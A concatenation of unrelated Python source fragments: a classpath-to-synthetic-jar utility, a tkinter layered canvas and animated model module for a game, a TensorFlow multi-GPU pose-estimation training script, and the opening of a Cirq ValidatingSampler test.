# Append '/' for directories, those not ending with '/' are assumed to be jars.
# Note isdir does what we need here to follow symlinks.
if os.path.isdir(url):
url_in_bundle += '/'
return url_in_bundle
return [relativize_url(url, root_dir) for url in classpath]
# VisibleForTesting
def safe_classpath(classpath, synthetic_jar_dir, custom_name=None):
"""Bundles classpath into one synthetic jar that includes original classpath in its manifest.
This is to ensure classpath length never exceeds platform ARG_MAX.
:param list classpath: Classpath to be bundled.
:param string synthetic_jar_dir: directory to store the synthetic jar, if `None`
a temp directory will be provided and cleaned up upon process exit. Otherwise synthetic
jar will remain in the supplied directory, only for debugging purpose.
:param custom_name: filename of the synthetic jar to be created.
:returns: A classpath (singleton list with just the synthetic jar).
:rtype: list of strings
"""
if synthetic_jar_dir:
safe_mkdir(synthetic_jar_dir)
else:
synthetic_jar_dir = safe_mkdtemp()
# Quote the paths so that if they contain reserved characters can be safely passed to JVM classloader.
bundled_classpath = map(urllib.quote, relativize_classpath(classpath, synthetic_jar_dir))
manifest = Manifest()
manifest.addentry(Manifest.CLASS_PATH, ' '.join(bundled_classpath))
with temporary_file(root_dir=synthetic_jar_dir, cleanup=False, suffix='.jar') as jar_file:
with open_zip(jar_file, mode='w', compression=ZIP_STORED) as jar:
jar.writestr(Manifest.PATH, manifest.contents())
if custom_name:
custom_path = os.path.join(synthetic_jar_dir, custom_name)
safe_concurrent_rename(jar_file.name, custom_path)
return [custom_path]
else:
return [jar_file.name]
|
import tkinter as tk
import multiprocessing as mp
import os
import sys
import json
import threading
import time
import random
import math
class CanvasController:
def __init__(self, canvas, game = None, layers = None, get_pil = False):
self.canvas = canvas
self.game = game
self.winfo_width = self.canvas.winfo_width
self.winfo_height = self.canvas.winfo_height
self.find_overlapping = self.canvas.find_overlapping
self.config = self.canvas.config
self.bind = self.canvas.bind
self.unbind = self.canvas.unbind
self.unbind_all = self.canvas.unbind_all
self.global_time = 0
class pillow:
image = None
image_chops = None
photoimage = None
gifimage = None
self.pillow = pillow
if get_pil:
self.pillow.image = __import__('PIL.Image').Image
self.pillow.image_chops = __import__('PIL.ImageChops').ImageChops
self.pillow.photoimage = __import__('PIL.ImageTk').ImageTk.PhotoImage
self.pillow.gifimage = __import__('PIL.GifImagePlugin').GifImagePlugin.GifImageFile
if layers is None:
layers = ['user', 'layers.json']
self.layers = []
self.reserved_args = ['layer']
with open(os.path.join(sys.path[0], *layers), 'r') as file:
self.layer_config = json.load(file) #load user defined order for screen items to be rendered in
self.reset_time()
def create_rectangle(self, *coords, **args):
'Wrapper function to provide tk canvas-like syntax'
return self._create('rectangle', coords, args)
def create_image(self, *coords, **args):
'Wrapper function to provide tk canvas-like syntax'
return self._create('image', coords, args)
def create_text(self, *coords, **args):
return self._create('text', coords, args)
def create_window(self, *coords, **args):
return self._create('window', coords, args)
def create_line(self, *coords, **args):
return self._create('line', coords, args)
def _create(self, obj_type, coords, args):
if not 'layer' in args:
args['layer'] = 0
if type(args['layer']) == str: #layer is string, use lookup table
if args['layer'] in self.layer_config:
args['layer'] = self.layer_config[args['layer']]
else:
raise ValueError('Couldn\'t find layer name "{}" in config'.format(args['layer'])) #layer not in lookup table
while not len(self.layers) >= args['layer'] + 1:
self.layers.append([]) #make layer if it doesn't exist
filtered_args = {} #remove arguments that are reserved for controller (layer etc) and pass the rest on to the canvas
for key in args:
if not key in self.reserved_args:
filtered_args[key] = args[key]
if obj_type == 'image': #call relevant canvas function
obj = self.canvas.create_image(*coords, **filtered_args)
elif obj_type == 'text':
obj = self.canvas.create_text(*coords, **filtered_args)
elif obj_type == 'window':
obj = self.canvas.create_window(*coords, **filtered_args)
elif obj_type == 'line':
obj = self.canvas.create_line(*coords, **filtered_args)
else:
obj = self.canvas.create_rectangle(*coords, **filtered_args)
self.layers[args['layer']].append({'object': obj})
## objects are always created on the top of their layer
if not len(self.layers) == args['layer'] + 1: ## logic to find next highest tag and move just below it
next_layer = None
for i in range(len(self.layers) - 1, args['layer'], -1):
if not len(self.layers[i]) == 0:
next_layer = i
if next_layer is None:
if len(self.layers) == 1:
lower_to = None
for i in range(args['layer']):
if not len(self.layers[i]) == 0:
lower_to = self.layers[i][len(self.layers[args['layer']]) - 1]
if not lower_to is None:
self.canvas.tag_lower(obj, lower_to['object'])
else:
self.canvas.tag_lower(obj, self.layers[args['layer']][len(self.layers[args['layer']]) - 2]['object'])
else:
self.canvas.tag_lower(obj, self.layers[next_layer][0]['object'])
return obj
def delete(self, obj):
'Delete item from canvas'
to_remove = []
for a in range(len(self.layers)):
for b in range(len(self.layers[a])):
if self.layers[a][b]['object'] == obj:
to_remove.append([a, b])
self.canvas.delete(obj)
to_remove.reverse()
for a, b in to_remove:
self.layers[a].pop(b)
def coords(self, obj, *coords):
'Set the coordinates of something on the canvas'
self.canvas.coords(obj, *coords)
def itemconfigure(self, obj, **args):
'Configure an item on the canvas'
self.canvas.itemconfigure(obj, **args)
def reset_time(self):
self.set_time(time.time())
def set_time(self, value):
self.global_time = value
class Model:
'''
Model:
Similar in function to canvas.create_image
canvas_controller - CanvasController object to render to
mdl_name - name of model in map files
map_path - path to map files
layer - string or int for canvas controller
'''
def __init__(self, canvas_controller, mdl_name, map_path, layer, autoplay_anims = True):
self.mdl_name = mdl_name
self.map_path = map_path
self.canvas_controller = canvas_controller
self.layer = layer
## make data structures
class attributes:
profile = None #e.g. idle
profiles = {}
profile_ranks = []
class pos: #current coordinates
x = 0
y = 0
rotation = 0 #current rotation (0-359)
transparency = 0 #current transparency (0-255)
interps_per_second = 0
render_quality = 0 #0-3 - render quality as defined in the user's config
uses_PIL = False
force_grid = None #none means don't force, boolean will force to that value
class anim_controller:
playing_onetime = False
revert_to = None
sync = False
revert_frame = None
onetime_start = None
frame = 0
run_loop = False
class snap:
x = 1
y = 1
running = True
self.attributes = attributes
class cfgs:
model = {}
user = {}
map = {}
self.cfgs = cfgs
class _set_queue_output:
ticket = 0
outputs = {}
self._set_queue_output = _set_queue_output
## load data into structures
#load configs
with open(os.path.join(self.map_path, 'models', self.mdl_name, 'list.json'), 'r') as file:
self.cfgs.model = json.load(file)
with open(os.path.join(sys.path[0], 'user', 'config.json'), 'r') as file:
self.cfgs.user = json.load(file)
with open(os.path.join(self.map_path, 'list.json'), 'r') as file:
self.cfgs.map = json.load(file)
self.pillow = self.canvas_controller.pillow
self.attributes.profile_ranks = self.cfgs.model['ranks']
self.attributes.profile = self.cfgs.model['default']
self.attributes.uses_PIL = self.cfgs.user['graphics']['PILrender']
self.attributes.render_quality = self.cfgs.user['graphics']['model quality']
self.attributes.interps_per_second = self.cfgs.user['network']['interpolations per second']
self.attributes.snap.x = self.cfgs.map['grid']['mult']['x']
self.attributes.snap.y = self.cfgs.map['grid']['mult']['y']
if self.cfgs.map['grid']['force']:
self.attributes.force_grid = self.cfgs.map['grid']['force value']
### Load profile data
for name in self.cfgs.model['profiles']:
self.attributes.profiles[name] = MdlProfile(self, self.cfgs.model['profiles'][name])
self.attributes.pos.x = self.attributes.profiles[self.attributes.profile].offscreen.x
self.attributes.pos.y = self.attributes.profiles[self.attributes.profile].offscreen.y
## start animation player if necessary
if autoplay_anims:
self.start_anims()
## call set
self.set(force = True)
def increment(self, x = None, y = None, rotation = None, transparency = None, frame = None, force = False):
if x is not None:
x += self.attributes.pos.x
if y is not None:
y += self.attributes.pos.y
if rotation is not None:
rotation += self.attributes.rotation
if transparency is not None:
transparency += self.attributes.transparency
if frame is not None:
frame = (frame + self.attributes.anim_controller.frame) % self.attributes.profiles[self.attributes.profile].animation.frames
self.set(x, y, rotation, transparency, frame, force)
def set(self, x = None, y = None, rotation = None, transparency = None, frame = None, force = False, image_set = None):
prev_image_set = self.attributes.profile
if image_set is not None:
self.attributes.profile = image_set
prev_x = self.attributes.pos.x
if x is not None:
self.attributes.pos.x = x
prev_y = self.attributes.pos.y
if y is not None:
self.attributes.pos.y = y
prev_rotation = self.attributes.rotation
if rotation is not None:
self.attributes.rotation = rotation
prev_transparency = self.attributes.transparency
if transparency is not None:
self.attributes.transparency = transparency
prev_frame = self.attributes.anim_controller.frame
if frame is not None:
self.attributes.anim_controller.frame = frame
#check if the function has been called with any arguments at all
if x is None and y is None and rotation is None and transparency is None and frame is None and not force:
return None
#find what fields were changed
if force:
fields_changed = ['x', 'y', 'image set', 'rotation', 'transparency', 'frame']
else:
fields_changed = []
if (prev_image_set is None and image_set is not None) or self.attributes.profile != prev_image_set:
fields_changed.append('image set')
if (prev_x is None and x is not None) or self.snap_coords(self.attributes.pos.x, 0)[0] != self.snap_coords(prev_x, 0)[0]:
fields_changed.append('x')
if (prev_y is None and y is not None) or self.snap_coords(0, self.attributes.pos.y)[1] != self.snap_coords(0, prev_y)[1]:
fields_changed.append('y')
if (prev_rotation is None and rotation is not None) or self.attributes.profiles[self.attributes.profile].squash_rotation(self.attributes.rotation) != self.attributes.profiles[self.attributes.profile].squash_rotation(prev_rotation):
fields_changed.append('rotation')
if (prev_transparency is None and transparency is not None) or self.attributes.profiles[self.attributes.profile].squash_transparency(self.attributes.transparency) != self.attributes.profiles[self.attributes.profile].squash_transparency(prev_transparency):
fields_changed.append('transparency')
if prev_frame is None or self.attributes.anim_controller.frame != prev_frame:
fields_changed.append('frame')
#check if only the positions were changed
if len(fields_changed) > 0: #make sure at least one field was changed
if False in [key in ['x', 'y'] for key in fields_changed]:
#move currently onscreen objects offscreen
self.attributes.profiles[prev_image_set].set_offscreen(prev_frame, prev_rotation, prev_transparency)
#move currently offscreen objects onscreen
self.attributes.profiles[self.attributes.profile].setpos(self.attributes.pos.x, self.attributes.pos.y, self.attributes.anim_controller.frame, self.attributes.rotation, self.attributes.transparency)
def get_object(self, profile, frame, layer, rotation, transparency):
return self.attributes.profiles[profile].get_obj(frame, layer, rotation, transparency)
def destroy(self):
current_profile = self.attributes.profiles[self.attributes.profile]
current_profile.set_offscreen(self.attributes.anim_controller.frame, self.attributes.rotation, self.attributes.transparency)
for profile_name in self.attributes.profiles:
self.attributes.profiles[profile_name].destroy()
self.attributes.anim_controller.run_loop = False
self.attributes.running = False
def _anim_player(self):
if self.attributes.profiles[self.attributes.profile].animation.sync:
time.sleep((self.attributes.profiles[self.attributes.profile].animation.delay * self.attributes.profiles[self.attributes.profile].animation.frames) - ((time.time() - self.canvas_controller.global_time) % (self.attributes.profiles[self.attributes.profile].animation.delay * self.attributes.profiles[self.attributes.profile].animation.frames)))
while self.attributes.anim_controller.run_loop:
time.sleep(self.attributes.profiles[self.attributes.profile].animation.delay + random.choice([0, self.attributes.profiles[self.attributes.profile].animation.variation, 0 - self.attributes.profiles[self.attributes.profile].animation.variation]))
if self.attributes.anim_controller.playing_onetime and self.attributes.profiles[self.attributes.profile].animation.frames - 1 == self.attributes.anim_controller.frame: #resynchronise animations
old_anim_delay = self.attributes.profiles[self.attributes.profile].animation.delay
old_anim_length = self.attributes.profiles[self.attributes.profile].animation.frames
self.set(image_set = self.attributes.anim_controller.revert_to, frame = 0)
new_elapsed = time.time() - self.attributes.anim_controller.onetime_start
frames_elapsed = new_elapsed / self.attributes.profiles[self.attributes.profile].animation.delay
self.set(frame = math.ceil(frames_elapsed) % self.attributes.profiles[self.attributes.profile].animation.frames)
time.sleep((self.attributes.profiles[self.attributes.profile].animation.delay - (time.time() - self.attributes.anim_controller.onetime_start - (old_anim_delay * old_anim_length))) % self.attributes.profiles[self.attributes.profile].animation.delay)
self.attributes.anim_controller.playing_onetime = False
self.attributes.anim_controller.revert_to = None
self.increment(frame = 1)
def snap_coords(self, x, y):
x /= self.attributes.snap.x
y /= self.attributes.snap.y
x = math.floor(x)
y = math.floor(y)
x += 0.5
y += 0.5
x *= self.attributes.snap.x
y *= self.attributes.snap.y
return int(x), int(y)
def play_anim(self, name, ignore_precedence = False):
""""Plays an animation once through. If the animation is already playing, it will reset to the start"""
if self.compare_profiles(self.attributes.profile, name) or not ignore_precedence:
self.attributes.anim_controller.playing_onetime = True
self.attributes.anim_controller.onetime_start = time.time()
if not self.attributes.profile == name:
self.attributes.anim_controller.revert_to = self.attributes.profile
self.attributes.anim_controller.revert_frame = self.attributes.anim_controller.frame
self.set(image_set = name, frame = 0)
def loop_anim(self, name):
"""Loop an animation. This will force the selected animation"""
self.attributes.anim_controller.onetime_start = time.time()
self.attributes.anim_controller.playing_onetime = False
self.attributes.anim_controller.revert_to = self.attributes.profile
self.set(image_set = name, frame = 0)
def start_anims(self):
if self.attributes.anim_controller.run_loop:
threading.Thread(target = self._anim_player, name = 'Model animation player', daemon = True).start()
def compare_profiles(self, prof0, prof1):
"""Checks if profile 0 takes precedence over profile 1"""
if prof0 == prof1:
return False
elif prof0 in self.attributes.profile_ranks and prof1 in self.attributes.profile_ranks:
return self.attributes.profile_ranks.index(prof0) < self.attributes.profile_ranks.index(prof1)
elif prof0 in self.attributes.profile_ranks:
return True
elif prof1 in self.attributes.profile_ranks:
return False
setpos = set
class MdlProfile:
def __init__(self, model, data = None):
self.model = model
self._cfg = data
class offscreen:
x = 0
y = 0
self.offscreen = offscreen
class offset:
x = 0
y = 0
self.offset = offset
self.rotations = [1, 1, 1, 1]
self.transparencies = [1, 1, 1, 1]
self.layers = [1, 1, 1, 1]
self.num_existing_layers = 0
self.use_grid = False
self.uses_pil = False
class animation:
frames = 1
delay = 0
variation = 0
sync = False
self.animation = animation
self.imgs = []
self.transformed_imgs = []
self.canvobjs = []
if data is not None:
self.load(data)
def load(self, profile):
self._cfg = profile
#unpack data
self.offscreen.x = self._cfg['offscreen'][0]
self.offscreen.y = self._cfg['offscreen'][1]
if 'offset' in self._cfg:
self.offset.x = self._cfg['offset'][0]
self.offset.y = self._cfg['offset'][1]
self.rotations = self._cfg['rotations']
self.transparencies = self._cfg['transparencies']
self.use_grid = self._cfg['use grid']
self.layers = self._cfg['layers']
self.uses_pil = self.model.attributes.uses_PIL
self.animation.frames = self._cfg['animation']['frames']
self.animation.delay = self._cfg['animation']['delay']
self.animation.variation = self._cfg['animation']['variation']
self.animation.sync = self._cfg['animation']['sync']
if not self.uses_pil and 'no PIL textures' in self._cfg:
self._cfg['textures'] = self._cfg['no PIL textures']
#load textures
##find the names of the textures
img_names = []
if type(self._cfg['textures']) == str:
img_names = [[os.path.join(frame, name) for name in os.listdir(os.path.join(self.model.map_path, 'models', self.model.mdl_name, frame)) if os.path.isfile(os.path.join(self.model.map_path, 'models', self.model.mdl_name, frame, name))] for frame in os.listdir(os.path.join(self.model.map_path, 'models', self.model.mdl_name, self._cfg['textures']))] #unpack a two-level tree of animations then layers
else:
for frame in self._cfg['textures']:
if type(frame) == str:
if frame.endswith('.gif'):
img_names.append(frame)
else:
img_names.append([name for name in os.listdir(os.path.join(self.model.map_path, 'models', self.model.mdl_name, frame)) if os.path.isfile(os.path.join(self.model.map_path, 'models', self.model.mdl_name, frame, name))])
else:
img_names.append(frame)
##load the textures into memory
if type(img_names[0]) == str: #list of gifs - load with flipped dimensions
layer_indexes = [i for i in range(len(img_names)) if float(i / math.ceil(len(img_names) / self.layers[self.model.attributes.render_quality])).is_integer()]
self.num_existing_layers = len(img_names)
self.imgs = [[] for i in range(self.animation.frames)]
for layer in img_names:
if img_names.index(layer) in layer_indexes:
for i in range(self.animation.frames):
if self.uses_pil:
tex = self.model.pillow.gifimage(os.path.join(self.model.map_path, 'models', self.model.mdl_name, layer))
tex.seek(i)
self.imgs[i].append(tex)
else:
self.imgs[i].append(tk.PhotoImage(file = os.path.join(self.model.map_path, 'models', self.model.mdl_name, layer), format = 'gif -index {}'.format(i)))
else:
layer_indexes = [i for i in range(len(img_names[0])) if float(i / math.ceil(len(img_names[0]) / self.layers[self.model.attributes.render_quality])).is_integer()]
self.num_existing_layers = len(img_names[0])
for frame in img_names:
current_slot = []
for name in frame:
if frame.index(name) in layer_indexes:
if self.uses_pil:
current_slot.append(self.model.pillow.image.open(os.path.join(self.model.map_path, 'models', self.model.mdl_name, name)))
else:
current_slot.append(tk.PhotoImage(file = os.path.join(self.model.map_path, 'models', self.model.mdl_name, name)))
self.imgs.append(current_slot)
##apply operations to textures
if self.uses_pil:
rotation_values = [(value / (self.rotations[self.model.attributes.render_quality] / 360)) % 360 for value in range(1, self.rotations[self.model.attributes.render_quality] + 1, 1)]
transparency_values = [value / (self.transparencies[self.model.attributes.render_quality] / 256) - 1 for value in range(1, self.transparencies[self.model.attributes.render_quality] + 1, 1)]
if self.transparencies[self.model.attributes.render_quality] > 1 and 0 not in transparency_values:
transparency_values = [0] + [(value / ((self.transparencies[self.model.attributes.render_quality] - 1) / 360)) % 360 for value in range(1, self.transparencies[self.model.attributes.render_quality], 1)]
else:
rotation_values = [0]
transparency_values = [255]
for frame in self.imgs:
this_frame = []
for layer in frame:
this_layer = []
for rotation in rotation_values:
this_rotation = []
for transparency in transparency_values:
this_rotation.append(self.apply_to(layer, rotation, transparency))
this_layer.append(this_rotation)
this_frame.append(this_layer)
self.transformed_imgs.append(this_frame)
#make canvas objects
for frame in self.transformed_imgs:
new_layers = []
for layer in frame:
new_rotations = []
for rotation in layer:
new_transparencies = []
for image_ in rotation:
new_transparencies.append(self.model.canvas_controller.create_image(self.offscreen.x, self.offscreen.y, image = image_, layer = self.model.layer))
new_rotations.append(new_transparencies)
new_layers.append(new_rotations)
self.canvobjs.append(new_layers)
if len(self.canvobjs) > 1:
self.model.attributes.anim_controller.run_loop = True
def apply_to(self, image, rotation, transparency):
if self.uses_pil:
if not rotation == 0:
image = image.rotate((0 - rotation) % 360)
if not transparency == 255:
try:
image = self.model.pillow.image_chops.multiply(image, self.model.pillow.image.new('RGBA', image.size, color = (255, 255, 255, int(transparency))))
except ValueError:
raise ValueError('Model texture doesn\'t have an alpha channel - make sure it uses 32 bit colour')
return self.model.pillow.photoimage(image)
else:
return image
def get_obj(self, frame, layer, rotation, transparency):
if self.uses_pil:
rot = int((self.squash_rotation(rotation) / 360) * self.rotations[self.model.attributes.render_quality])
transp = int(self.squash_transparency(transparency) / (256 / self.transparencies[self.model.attributes.render_quality]))
return self.canvobjs[frame][layer][rot][transp]
else:
return self.canvobjs[frame][layer][0][0]
def get_offset(self, layer):
real_index = int(layer * (self.num_existing_layers / len(self.canvobjs[0])))
return self.offset.x * real_index, self.offset.y * real_index
def destroy(self):
for frame in self.canvobjs:
for layer in frame:
for rotation in layer:
for canvobj in rotation:
self.model.canvas_controller.delete(canvobj)
def squash_rotation(self, rotation):
return self.clamp_to(rotation % 360, 360 / self.rotations[self.model.attributes.render_quality])
def squash_transparency(self, transparency):
return self.clamp_to(transparency, 256 / self.transparencies[self.model.attributes.render_quality])
def clamp_to(self, value, division, func_clamp = int):
return func_clamp(value / division) * division
def setpos(self, x, y, frame, rotation, transparency):
for layer in range(len(self.canvobjs[frame])):
if x == self.offscreen.x and y == self.offscreen.y:
self.model.canvas_controller.coords(self.get_obj(frame, layer, rotation, transparency), x, y)
else:
if self.use_grid:
self.model.canvas_controller.coords(self.get_obj(frame, layer, rotation, transparency), *self.model.snap_coords(x + self.get_offset(layer)[0], y + self.get_offset(layer)[1]))
else:
self.model.canvas_controller.coords(self.get_obj(frame, layer, rotation, transparency), x + self.get_offset(layer)[0], y + self.get_offset(layer)[1])
def set_offscreen(self, frame, rotation, transparency):
self.setpos(self.offscreen.x, self.offscreen.y, frame, rotation, transparency) |
import tensorflow as tf
import os
import sys
from nets.CPM import CPM
from nets.Hourglass import Hourglass
from data.DomeReader import DomeReader
from data.HumanReader import HumanReader
from data.MultiDataset import combineMultiDataset
from data.COCOReader import COCOReader
import pickle
import utils.general
import utils.PAF
from utils.multigpu import average_gradients
from tensorflow.python.client import device_lib
num_gpu = sum([_.device_type == 'GPU' for _ in device_lib.list_local_devices()])
fine_tune = True
already_trained = 100000
train_para = {'lr': [1e-4, 1e-5],
'lr_iter': [100000],
'max_iter': 200000,
'show_loss_freq': 10,
'snapshot_freq': 5000,
'snapshot_dir': 'snapshots/PAF_body_headtop_domehumanCOCO_chest_noPAF',
'finetune_dir': 'snapshots/PAF_body_headtop_domehumanCOCO_chest_noPAF',
'loss_weight_PAF': 1.0,
}
PATH_TO_SNAPSHOTS = './{}/model-{}'.format(train_para['finetune_dir'], already_trained) # only used when USE_RETRAINED is true
numStage = 5
ignore_PAF_2D = True
with tf.Graph().as_default(), tf.device('/cpu:0'):
domereader = DomeReader(mode='training', batch_size=1, shuffle=True, objtype=0, crop_noise=True, full_only=False, head_top=True)
# domereader.rotate_augmentation = True
human36reader = HumanReader(mode='training', batch_size=2, shuffle=True, objtype=0, crop_noise=True)
# mpi3dreader = HumanReader(mode='training', name='MPI_INF_3DHP', batch_size=2, shuffle=True, objtype=0, crop_noise=True)
cocoreader = COCOReader(mode='training', batch_size=1, shuffle=True, objtype=0, crop_noise=True)
# cocoreader.rotate_augmentation = True
# upreader = HumanReader(mode='training', name='UP', batch_size=1, shuffle=True, objtype=0, crop_noise=True)
# surrealreader = HumanReader(mode='training', name='SURREAL', batch_size=3, shuffle=True, objtype=0, crop_noise=True)
# domereader.crop_size = 512
# human36reader.crop_size = 512
# cocoreader.crop_size = 512
data = combineMultiDataset([
domereader.get(),
human36reader.get(),
cocoreader.get(),
# mpi3dreader.get()
# upreader.get(),
# surrealreader.get()
],
name_wanted=['image_crop', 'scoremap2d', 'body_valid', 'PAF', 'PAF_type', 'mask_crop'])
for k, v in data.items():
data[k] = tf.split(v, num_gpu, 0)
if fine_tune:
global_step = tf.Variable(already_trained + 1, trainable=False, name="global_step")
else:
global_step = tf.Variable(0, trainable=False, name="global_step")
lr_scheduler = utils.general.LearningRateScheduler(values=train_para['lr'], steps=train_para['lr_iter'])
lr = lr_scheduler.get_lr(global_step)
opt = tf.train.AdamOptimizer(lr)
tower_grads = []
tower_losses = []
tower_losses_PAF = []
tower_losses_2d = []
with tf.variable_scope(tf.get_variable_scope()):
for ig in range(num_gpu):
with tf.device('/gpu:%d' % ig):
# build network
net = CPM(out_chan=21, crop_size=368, withPAF=True, PAFdim=3, numPAF=23, numStage=numStage)
predicted_scoremaps, _, predicted_PAFs = net.inference(data['image_crop'][ig], train=True)
# with tf.variable_scope('hourglass'):
# net = Hourglass(num_output_channel=20, PAF_dim=3, num_PAF=20, num_hourglass=numStage)
# predicted_scoremaps, predicted_PAFs = net.inference(data['image_crop'][ig])
# Loss
s = data['scoremap2d'][ig].get_shape().as_list()
valid = tf.concat([data['body_valid'][ig], tf.zeros((s[0], 1), dtype=tf.bool)], axis=1)
valid = tf.cast(valid, tf.float32)
mask_scoremap = tf.tile(tf.expand_dims(data['mask_crop'][ig], axis=3), [1, 1, 1, s[3]])
loss_2d = 0.0
# multiply mask_scoremap to mask out the invalid areas
for ip, predicted_scoremap in enumerate(predicted_scoremaps):
resized_scoremap = tf.image.resize_images(predicted_scoremap, (s[1], s[2]), method=tf.image.ResizeMethod.BICUBIC)
mean_over_pixel = tf.reduce_sum(tf.square((resized_scoremap - data['scoremap2d'][ig]) * mask_scoremap), [1, 2]) / (tf.reduce_sum(mask_scoremap, [1, 2]) + 1e-6)
loss_2d_ig = tf.reduce_sum(valid * mean_over_pixel) / (tf.reduce_sum(valid) + 1e-6)
loss_2d += loss_2d_ig
loss_2d /= len(predicted_scoremaps)
assert 'PAF' in data
loss_PAF = 0.0
valid_PAF = tf.cast(utils.PAF.getValidPAF(data['body_valid'][ig], 0, PAFdim=3), tf.float32)
# multiply mask_PAF to mask out the invalid areas
s = data['PAF'][ig].get_shape().as_list()
mask_PAF = tf.tile(tf.expand_dims(data['mask_crop'][ig], axis=3), [1, 1, 1, s[3]])
mask_PAF = tf.reshape(mask_PAF, [s[0], s[1], s[2], -1, 3]) # detach x, y, z
if ignore_PAF_2D:
mask_PAF2D = mask_PAF * tf.constant([0, 0, 0], dtype=tf.float32)
else:
mask_PAF2D = mask_PAF * tf.constant([1, 1, 0], dtype=tf.float32) # for the 2D case
mask_PAF = tf.where(data['PAF_type'][ig], mask_PAF, mask_PAF2D) # take out corresponding mask by PAF type
mask_PAF = tf.reshape(mask_PAF, [s[0], s[1], s[2], -1])
for ip, pred_PAF in enumerate(predicted_PAFs):
resized_PAF = tf.image.resize_images(pred_PAF, (s[1], s[2]), method=tf.image.ResizeMethod.BICUBIC)
channelWisePAF = tf.reshape(resized_PAF, [s[0], s[1], s[2], -1, 3])
PAF_x2y2 = tf.sqrt(tf.reduce_sum(tf.square(channelWisePAF[:, :, :, :, 0:2]), axis=4)) + 1e-6
PAF_normed_x = channelWisePAF[:, :, :, :, 0] / PAF_x2y2
PAF_normed_y = channelWisePAF[:, :, :, :, 1] / PAF_x2y2
PAF_normed_z = tf.zeros(PAF_normed_x.get_shape(), dtype=tf.float32)
normed_PAF = tf.stack([PAF_normed_x, PAF_normed_y, PAF_normed_z], axis=4)
normed_PAF = tf.reshape(normed_PAF, [s[0], s[1], s[2], -1])
normed_PAF = tf.where(tf.logical_and(tf.not_equal(data['PAF'][ig], 0.0), tf.not_equal(resized_PAF, 0.0)),
normed_PAF, tf.zeros((s[0], s[1], s[2], s[3]), dtype=tf.float32)) # use normed_PAF only in pixels where PAF is not zero
final_PAF = tf.where(data['PAF_type'][ig], resized_PAF, normed_PAF)
# mean_over_pixel = tf.reduce_sum(tf.square((resized_PAF - data['PAF'][ig]) * mask_PAF), [1, 2]) / (tf.reduce_sum(mask_PAF, [1, 2]) + 1e-6)
mean_over_pixel = tf.reduce_sum(tf.square((final_PAF - data['PAF'][ig]) * mask_PAF), [1, 2]) / (tf.reduce_sum(mask_PAF, [1, 2]) + 1e-6)
loss_PAF_ig = tf.reduce_sum(valid_PAF * mean_over_pixel) / (tf.reduce_sum(valid_PAF) + 1e-6)
loss_PAF += loss_PAF_ig
loss_PAF /= len(predicted_PAFs)
loss = loss_2d + loss_PAF * train_para['loss_weight_PAF']
tf.get_variable_scope().reuse_variables()
tower_losses.append(loss)
tower_losses_PAF.append(loss_PAF)
tower_losses_2d.append(loss_2d)
grad = opt.compute_gradients(loss)
tower_grads.append(grad)
total_loss = tf.reduce_mean(tower_losses)
total_loss_PAF = tf.reduce_mean(tower_losses_PAF)
total_loss_2d = tf.reduce_mean(tower_losses_2d)
grads = average_gradients(tower_grads)
apply_gradient_op = opt.apply_gradients(grads, global_step=global_step)
gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.6)
sess = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options, allow_soft_placement=True))
sess.run(tf.global_variables_initializer())
tf.train.start_queue_runners(sess=sess)
tf.summary.scalar('loss', total_loss)
tf.summary.scalar('loss_PAF', total_loss_PAF)
tf.summary.scalar('loss_2d', total_loss_2d)
# init weights
sess.run(tf.global_variables_initializer())
saver = tf.train.Saver(max_to_keep=None)
merged = tf.summary.merge_all()
train_writer = tf.summary.FileWriter(train_para['snapshot_dir'] + '/train', sess.graph)
if not fine_tune:
start_iter = 0
if net.name == 'CPM':
net.init('./weights/openpose_body_3DPAF_randomz_headtop_chest.npy', sess)
# net.init('./weights/openpose_body_expanded_PAF.npy', sess)
elif net.name == 'Hourglass':
from tensorflow.contrib.framework import assign_from_values_fn
with open('weights/Hourglass_weights_processed.pkl', 'rb') as f:
hg_data = pickle.load(f)
map_trainable_variables = {i.name.replace('hourglass', 'my_model').replace(':0', ''): i.name for i in tf.trainable_variables()}
dic = dict()
for i, j in map_trainable_variables.items():
if i in hg_data:
dic[j] = hg_data[i]
init_fn = assign_from_values_fn(dic)
assert init_fn is not None
init_fn(sess)
else:
raise NotImplementedError
# net.init_vgg(sess)
else:
from utils.load_ckpt import load_weights_from_snapshot
load_weights_from_snapshot(sess, PATH_TO_SNAPSHOTS)
# saver.restore(sess, PATH_TO_SNAPSHOTS)
start_iter = already_trained + 1
# snapshot dir
if not os.path.exists(train_para['snapshot_dir']):
os.mkdir(train_para['snapshot_dir'])
print('Created snapshot dir:', train_para['snapshot_dir'])
# Training loop
print('Starting to train ...')
for i in range(start_iter, train_para['max_iter']):
# V = sess.run([resized_PAF, mask_PAF, PAF_x2y2, PAF_normed_x, PAF_normed_y, PAF_normed_z, normed_PAF, final_PAF, mean_over_pixel, loss_PAF_ig])
# import pdb
# pdb.set_trace()
summary, _, loss_v, loss_2d_v, loss_PAF_v = sess.run([merged, apply_gradient_op, total_loss, total_loss_2d, total_loss_PAF])
train_writer.add_summary(summary, i)
if (i % train_para['show_loss_freq']) == 0:
print('Iteration %d\t Loss %.1e, Loss_2d %.1e, Loss_PAF %.1e' % (i, loss_v, loss_2d_v, loss_PAF_v))
sys.stdout.flush()
if (i % train_para['snapshot_freq']) == 0 and i > start_iter:
saver.save(sess, "%s/model" % train_para['snapshot_dir'], global_step=i)
print('Saved a snapshot.')
sys.stdout.flush()
print('Training finished. Saving final snapshot.')
saver.save(sess, "%s/model" % train_para['snapshot_dir'], global_step=train_para['max_iter'])
|
# Copyright 2021 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import List
import pytest
import sympy
import numpy as np
import cirq
import cirq_google as cg
def test_device_validation():
sampler = cg.ValidatingSampler(
device=cg.Sycamore23, validator=lambda c, s, r: True, sampler=cirq.Simulator()
)
# Good qubit
q = cirq.GridQubit(5, 2)
circuit = cirq.Circuit(cirq.X(q) ** sympy.Symbol('t'), cirq.measure(q, key='m'))
sweep = cirq.Points(key='t', points=[1, 0])
results = sampler.run_sweep(circuit, sweep, repetitions=100)
assert np.all(results[0].measurements['m'] == 1)
assert np.all(results[1].measurements['m'] == 0)
# Bad qubit
